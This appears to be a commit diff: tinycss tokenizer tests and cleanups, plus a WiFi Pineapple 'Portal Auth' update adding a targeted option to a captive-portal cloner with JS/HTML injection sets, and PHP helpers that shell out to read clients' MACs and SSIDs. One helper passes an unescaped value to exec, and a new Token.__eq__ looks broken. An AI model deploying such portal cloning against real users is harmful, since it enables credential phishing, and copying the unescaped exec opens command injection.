assert_errors(stylesheet.errors, ['@page rule not allowed in @media'])
at_media_rule, = stylesheet.rules
assert at_media_rule.at_keyword == '@media'
assert at_media_rule.rules == []
stylesheet = CSSPage3Parser().parse_stylesheet(css)
assert stylesheet.errors == []
at_media_rule, = stylesheet.rules
at_page_rule, = at_media_rule.rules
assert at_media_rule.at_keyword == '@media'
assert at_page_rule.at_keyword == '@page'
assert len(at_page_rule.declarations) == 1

View File

@ -0,0 +1,302 @@
# coding: utf-8
"""
Tests for the tokenizer
-----------------------
:copyright: (c) 2012 by Simon Sapin.
:license: BSD, see LICENSE for more details.
"""
from __future__ import unicode_literals
import os
import sys
import pytest
from tinycss.tokenizer import (
cython_tokenize_flat, python_tokenize_flat, regroup)
def test_speedups():
is_pypy = hasattr(sys, 'pypy_translation_info')
env_skip_tests = os.environ.get('TINYCSS_SKIP_SPEEDUPS_TESTS')
# pragma: no cover
if is_pypy or env_skip_tests:
return
assert cython_tokenize_flat is not None, (
'Cython speedups are not installed, related tests will '
'be skipped. Set the TINYCSS_SKIP_SPEEDUPS_TESTS environment '
'variable if this is expected.')
@pytest.mark.parametrize(('tokenize', 'css_source', 'expected_tokens'), [
(tokenize,) + test_data
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
('', []),
('red -->', [('IDENT', 'red'), ('S', ' '), ('CDC', '-->')]),
# Longest match rule: no CDC
('red-->', [('IDENT', 'red--'), ('DELIM', '>')]),
(r'p[example="foo(int x) { this.x = x;}"]', [
('IDENT', 'p'),
('[', '['),
('IDENT', 'example'),
('DELIM', '='),
('STRING', 'foo(int x) { this.x = x;}'),
(']', ']')]),
# Numbers are parsed
('42 .5 -4pX 1.25em 30%', [
('INTEGER', 42), ('S', ' '),
('NUMBER', .5), ('S', ' '),
# units are normalized to lower-case:
('DIMENSION', -4, 'px'), ('S', ' '),
('DIMENSION', 1.25, 'em'), ('S', ' '),
('PERCENTAGE', 30, '%')]),
# URLs are extracted
('url(foo.png)', [('URI', 'foo.png')]),
('url("foo.png")', [('URI', 'foo.png')]),
# Escaping
(r'/* Comment with a \ backslash */', [
('COMMENT', '/* Comment with a \ backslash */')]), # Unchanged
# backslash followed by a newline in a string: ignored
('"Lorem\\\nIpsum"', [('STRING', 'LoremIpsum')]),
# backslash followed by a newline outside a string: stands for itself
('Lorem\\\nIpsum', [
('IDENT', 'Lorem'), ('DELIM', '\\'),
('S', '\n'), ('IDENT', 'Ipsum')]),
# Cancel the meaning of special characters
(r'"Lore\m Ipsum"', [('STRING', 'Lorem Ipsum')]), # or not specal
(r'"Lorem \49psum"', [('STRING', 'Lorem Ipsum')]),
(r'"Lorem \49 psum"', [('STRING', 'Lorem Ipsum')]),
(r'"Lorem\"Ipsum"', [('STRING', 'Lorem"Ipsum')]),
(r'"Lorem\\Ipsum"', [('STRING', r'Lorem\Ipsum')]),
(r'"Lorem\5c Ipsum"', [('STRING', r'Lorem\Ipsum')]),
(r'Lorem\+Ipsum', [('IDENT', 'Lorem+Ipsum')]),
(r'Lorem+Ipsum', [
('IDENT', 'Lorem'), ('DELIM', '+'), ('IDENT', 'Ipsum')]),
(r'url(foo\).png)', [('URI', 'foo).png')]),
# Unicode and backslash escaping
('\\26 B', [('IDENT', '&B')]),
('\\&B', [('IDENT', '&B')]),
('@\\26\tB', [('ATKEYWORD', '@&B')]),
('@\\&B', [('ATKEYWORD', '@&B')]),
('#\\26\nB', [('HASH', '#&B')]),
('#\\&B', [('HASH', '#&B')]),
('\\26\r\nB(', [('FUNCTION', '&B(')]),
('\\&B(', [('FUNCTION', '&B(')]),
(r'12.5\000026B', [('DIMENSION', 12.5, '&b')]),
(r'12.5\0000263B', [('DIMENSION', 12.5, '&3b')]), # max 6 digits
(r'12.5\&B', [('DIMENSION', 12.5, '&b')]),
(r'"\26 B"', [('STRING', '&B')]),
(r"'\000026B'", [('STRING', '&B')]),
(r'"\&B"', [('STRING', '&B')]),
(r'url("\26 B")', [('URI', '&B')]),
(r'url(\26 B)', [('URI', '&B')]),
(r'url("\&B")', [('URI', '&B')]),
(r'url(\&B)', [('URI', '&B')]),
(r'Lorem\110000Ipsum', [('IDENT', 'Lorem\uFFFDIpsum')]),
# Bad strings
# String ends at EOF without closing: no error, parsed
('"Lorem\\26Ipsum', [('STRING', 'Lorem&Ipsum')]),
# Unescaped newline: ends the string, error, unparsed
('"Lorem\\26Ipsum\n', [
('BAD_STRING', r'"Lorem\26Ipsum'), ('S', '\n')]),
# Tokenization restarts after the newline, so the second " starts
# a new string (which ends at EOF without errors, as above.)
('"Lorem\\26Ipsum\ndolor" sit', [
('BAD_STRING', r'"Lorem\26Ipsum'), ('S', '\n'),
('IDENT', 'dolor'), ('STRING', ' sit')]),
]])
def test_tokens(tokenize, css_source, expected_tokens):
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
sources = [css_source]
if sys.version_info[0] < 3:
# On Python 2.x, ASCII-only bytestrings can be used
# where Unicode is expected.
sources.append(css_source.encode('ascii'))
for css_source in sources:
tokens = tokenize(css_source, ignore_comments=False)
result = [
(token.type, token.value) + (
() if token.unit is None else (token.unit,))
for token in tokens
]
assert result == expected_tokens
@pytest.mark.parametrize('tokenize', [
python_tokenize_flat, cython_tokenize_flat])
def test_positions(tokenize):
"""Test the reported line/column position of each token."""
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
css = '/* Lorem\nipsum */\fa {\n color: red;\tcontent: "dolor\\\fsit" }'
tokens = tokenize(css, ignore_comments=False)
result = [(token.type, token.line, token.column) for token in tokens]
assert result == [
('COMMENT', 1, 1), ('S', 2, 9),
('IDENT', 3, 1), ('S', 3, 2), ('{', 3, 3),
('S', 3, 4), ('IDENT', 4, 5), (':', 4, 10),
('S', 4, 11), ('IDENT', 4, 12), (';', 4, 15), ('S', 4, 16),
('IDENT', 4, 17), (':', 4, 24), ('S', 4, 25), ('STRING', 4, 26),
('S', 5, 5), ('}', 5, 6)]
@pytest.mark.parametrize(('tokenize', 'css_source', 'expected_tokens'), [
(tokenize,) + test_data
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
('', []),
(r'Lorem\26 "i\psum"4px', [
('IDENT', 'Lorem&'), ('STRING', 'ipsum'), ('DIMENSION', 4)]),
('not([[lorem]]{ipsum (42)})', [
('FUNCTION', 'not', [
('[', [
('[', [
('IDENT', 'lorem'),
]),
]),
('{', [
('IDENT', 'ipsum'),
('S', ' '),
('(', [
('INTEGER', 42),
])
])
])]),
# Close everything at EOF, no error
('a[b{"d', [
('IDENT', 'a'),
('[', [
('IDENT', 'b'),
('{', [
('STRING', 'd'),
]),
]),
]),
# Any remaining ), ] or } token is a nesting error
('a[b{d]e}', [
('IDENT', 'a'),
('[', [
('IDENT', 'b'),
('{', [
('IDENT', 'd'),
(']', ']'), # The error is visible here
('IDENT', 'e'),
]),
]),
]),
# ref:
('a[b{d}e]', [
('IDENT', 'a'),
('[', [
('IDENT', 'b'),
('{', [
('IDENT', 'd'),
]),
('IDENT', 'e'),
]),
]),
]])
def test_token_grouping(tokenize, css_source, expected_tokens):
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
tokens = regroup(tokenize(css_source, ignore_comments=False))
result = list(jsonify(tokens))
assert result == expected_tokens
def jsonify(tokens):
"""Turn tokens into "JSON-compatible" data structures."""
for token in tokens:
if token.type == 'FUNCTION':
yield (token.type, token.function_name,
list(jsonify(token.content)))
elif token.is_container:
yield token.type, list(jsonify(token.content))
else:
yield token.type, token.value
@pytest.mark.parametrize(('tokenize', 'ignore_comments', 'expected_tokens'), [
(tokenize,) + test_data
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
(False, [
('COMMENT', '/* lorem */'),
('S', ' '),
('IDENT', 'ipsum'),
('[', [
('IDENT', 'dolor'),
('COMMENT', '/* sit */'),
]),
('BAD_COMMENT', '/* amet')
]),
(True, [
('S', ' '),
('IDENT', 'ipsum'),
('[', [
('IDENT', 'dolor'),
]),
]),
]])
def test_comments(tokenize, ignore_comments, expected_tokens):
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
css_source = '/* lorem */ ipsum[dolor/* sit */]/* amet'
tokens = regroup(tokenize(css_source, ignore_comments))
result = list(jsonify(tokens))
assert result == expected_tokens
@pytest.mark.parametrize(('tokenize', 'css_source'), [
(tokenize, test_data)
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
r'p[example="foo(int x) { this.x = x;}"]',
'"Lorem\\26Ipsum\ndolor" sit',
'/* Lorem\nipsum */\fa {\n color: red;\tcontent: "dolor\\\fsit" }',
'not([[lorem]]{ipsum (42)})',
'a[b{d]e}',
'a[b{"d',
]])
def test_token_serialize_css(tokenize, css_source):
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
for _regroup in [regroup, lambda x: x]:
tokens = _regroup(tokenize(css_source, ignore_comments=False))
result = ''.join(token.as_css() for token in tokens)
assert result == css_source
@pytest.mark.parametrize(('tokenize', 'css_source'), [
(tokenize, test_data)
for tokenize in (python_tokenize_flat, cython_tokenize_flat)
for test_data in [
'(8, foo, [z])', '[8, foo, (z)]', '{8, foo, [z]}', 'func(8, foo, [z])'
]
])
def test_token_api(tokenize, css_source):
if tokenize is None: # pragma: no cover
pytest.skip('Speedups not available')
tokens = list(regroup(tokenize(css_source)))
assert len(tokens) == 1
token = tokens[0]
expected_len = 7 # 2 spaces, 2 commas, 3 others.
assert len(token.content) == expected_len

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.token_data
------------------
@ -11,12 +11,11 @@
from __future__ import unicode_literals
import re
import sys
import operator
import functools
import operator
import re
import string
import sys
# * Raw strings with the r'' notation are used so that \ do not need
# to be escaped.
@ -206,7 +205,7 @@ NEWLINE_UNESCAPE = functools.partial(
'')
SIMPLE_UNESCAPE = functools.partial(
re.compile(r'\\(%s)' % COMPILED_MACROS['simple_escape'] , re.I).sub,
re.compile(r'\\(%s)' % COMPILED_MACROS['simple_escape'], re.I).sub,
# Same as r'\1', but faster on CPython
operator.methodcaller('group', 1))
@ -329,6 +328,18 @@ class Token(object):
return ('<Token {0.type} at {0.line}:{0.column} {0.value!r}{1}>'
.format(self, self.unit or ''))
def __eq__(self, other):
if type(self) != type(other):
raise TypeError(
'Cannot compare {0} and {1}'.format(type(self), type(other)))
else:
return all(
self.type_ == other.type_,
self._as_css == other._as_css,
self.value == other.value,
self.unit == other.unit,
)
class ContainerToken(object):
"""A token that contains other (nested) tokens.

View File

@ -1,4 +1,4 @@
# coding: utf8
# coding: utf-8
"""
tinycss.tokenizer
-----------------
@ -17,20 +17,20 @@ from __future__ import unicode_literals
from . import token_data
def tokenize_flat(css_source, ignore_comments=True,
# Make these local variable to avoid global lookups in the loop
tokens_dispatch=token_data.TOKEN_DISPATCH,
unicode_unescape=token_data.UNICODE_UNESCAPE,
newline_unescape=token_data.NEWLINE_UNESCAPE,
simple_unescape=token_data.SIMPLE_UNESCAPE,
find_newlines=token_data.FIND_NEWLINES,
Token=token_data.Token,
len=len,
int=int,
float=float,
list=list,
_None=None,
):
def tokenize_flat(
css_source, ignore_comments=True,
# Make these local variable to avoid global lookups in the loop
tokens_dispatch=token_data.TOKEN_DISPATCH,
unicode_unescape=token_data.UNICODE_UNESCAPE,
newline_unescape=token_data.NEWLINE_UNESCAPE,
simple_unescape=token_data.SIMPLE_UNESCAPE,
find_newlines=token_data.FIND_NEWLINES,
Token=token_data.Token,
len=len,
int=int,
float=float,
list=list,
_None=None):
"""
:param css_source:
CSS as an unicode string
@ -158,10 +158,9 @@ def regroup(tokens):
tokens = iter(tokens)
eof = [False]
def _regroup_inner(stop_at=None,
tokens=tokens, pairs=pairs, eof=eof,
ContainerToken=token_data.ContainerToken,
FunctionToken=token_data.FunctionToken):
def _regroup_inner(stop_at=None, tokens=tokens, pairs=pairs, eof=eof,
ContainerToken=token_data.ContainerToken,
FunctionToken=token_data.FunctionToken):
for token in tokens:
type_ = token.type
if type_ == stop_at:

View File

@ -0,0 +1 @@
VERSION = '0.4'

View File

@ -1 +0,0 @@
VERSION = '0.3'

View File

@ -16,10 +16,11 @@ parser.add_argument('--stripjs', action='store_true', dest='stripjs', help='Stri
parser.add_argument('--stripcss', action='store_true', dest='stripcss', help='Strip inline CSS from the cloned portal', required=False)
parser.add_argument('--striplinks', action='store_true', dest='striplinks', help='Strip links from the cloned portal', required=False)
parser.add_argument('--stripforms', action='store_true', dest='stripforms', help='Strip form elements from the cloned portal', required=False)
parser.add_argument('--targeted', action='store_true', dest='targeted', help='Clone to a targeted portal', required=False)
args = parser.parse_args()
cloner = PortalCloner(args.portalName, args.portalArchive, args.injectionSet)
cloner = PortalCloner(args.portalName, args.portalArchive, args.injectionSet, args.targeted)
cloner.fetchPage(args.url)
cloner.cloneResources()

View File

@ -2,25 +2,33 @@
class MyPortal extends Portal
{
public function handleAuthorization()
{
// handle form input or other extra things there
public function handleAuthorization()
{
// Call parent to handle basic authorization first
parent::handleAuthorization();
// Call parent to handle basic authorization first
parent::handleAuthorization();
// Check for other form data here
}
}
public function showSuccess()
{
// Calls default success message
//parent::showSuccess();
parent::redirect();
}
/**
* Override this to do something when the client is successfully authorized.
* By default it just notifies the Web UI.
*/
public function onSuccess()
{
// Calls default success message
parent::onSuccess();
}
public function showError()
{
// Calls default error message
parent::showError();
}
/**
* If an error occurs then do something here.
* Override to provide your own functionality.
*/
public function showError()
{
// Calls default error message
parent::showError();
}
}

View File

@ -0,0 +1,45 @@
<?php
/**
* getClientMac
* Gets the mac address of a client by the IP address
* Returns the mac address as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientMac($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
* getClientSSID
* Gets the SSID a client is associated by the IP address
* Returns the SSID as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientSSID($clientIP)
{
// Get the clients mac address. We need this to get the SSID
$mac = getClientMac($clientIP);
// get the path to the log file
$pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
// get the ssid
return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
* getClientHostName
* Gets the host name of the connected client by the IP address
* Returns the host name as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientHostName($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -50,6 +50,7 @@ registerController('PortalAuthController', ['$api', '$scope', '$sce', '$interval
$scope.cloner_injectJS = true;
$scope.cloner_injectCSS = true;
$scope.cloner_injectHTML = true;
$scope.cloner_targetedPortal = false;
// PASS elements
$scope.passStatus = "Disabled";
@ -502,6 +503,7 @@ registerController('PortalAuthController', ['$api', '$scope', '$sce', '$interval
clonerOpts += $scope.cloner_injectJS ? "injectjs;" : "";
clonerOpts += $scope.cloner_injectCSS ? "injectcss;" : "";
clonerOpts += $scope.cloner_injectHTML ? "injecthtml;" : "";
clonerOpts += $scope.cloner_targetedPortal ? "targeted;" : "";
clonerOpts = clonerOpts.slice(0,-1);
$api.request({
@ -538,6 +540,7 @@ registerController('PortalAuthController', ['$api', '$scope', '$sce', '$interval
$scope.cloner_injectJS = true;
$scope.cloner_injectCSS = true;
$scope.cloner_injectHTML = true;
$scope.cloner_targetedPortal = false;
});
$scope.swapDiv = (function(div){
if (div == "pass") {
@ -741,7 +744,7 @@ registerController('PortalAuthController', ['$api', '$scope', '$sce', '$interval
// Init functions
$scope.init();
$scope.depends("-check");
$scope.isOnline();
//$scope.isOnline();
$scope.checkTestServerConfig();
$scope.checkPortalExists();
$scope.getConfigs();

View File

@ -228,6 +228,11 @@ $(document).on('mouseenter', '.pa_hoverDanger', function() {
<input type="checkbox" ng-model="cloner_stripForms"><strong>Strip Forms</strong>
</label>
</div>
<div class="col-md-6">
<label class="checkbox-inline">
<input type="checkbox" ng-model="cloner_targetedPortal"><strong>Targeted Portal</strong>
</label>
</div>
</div>
<div class="col-md-12" style="margin-top: 20px; text-align: center">
<button class="btn btn-success btn-block" ng-click="clonePortal();">Clone Portal</button>

View File

@ -6,5 +6,5 @@
"tetra"
],
"title": "Portal Auth",
"version": "1.6"
"version": "1.7"
}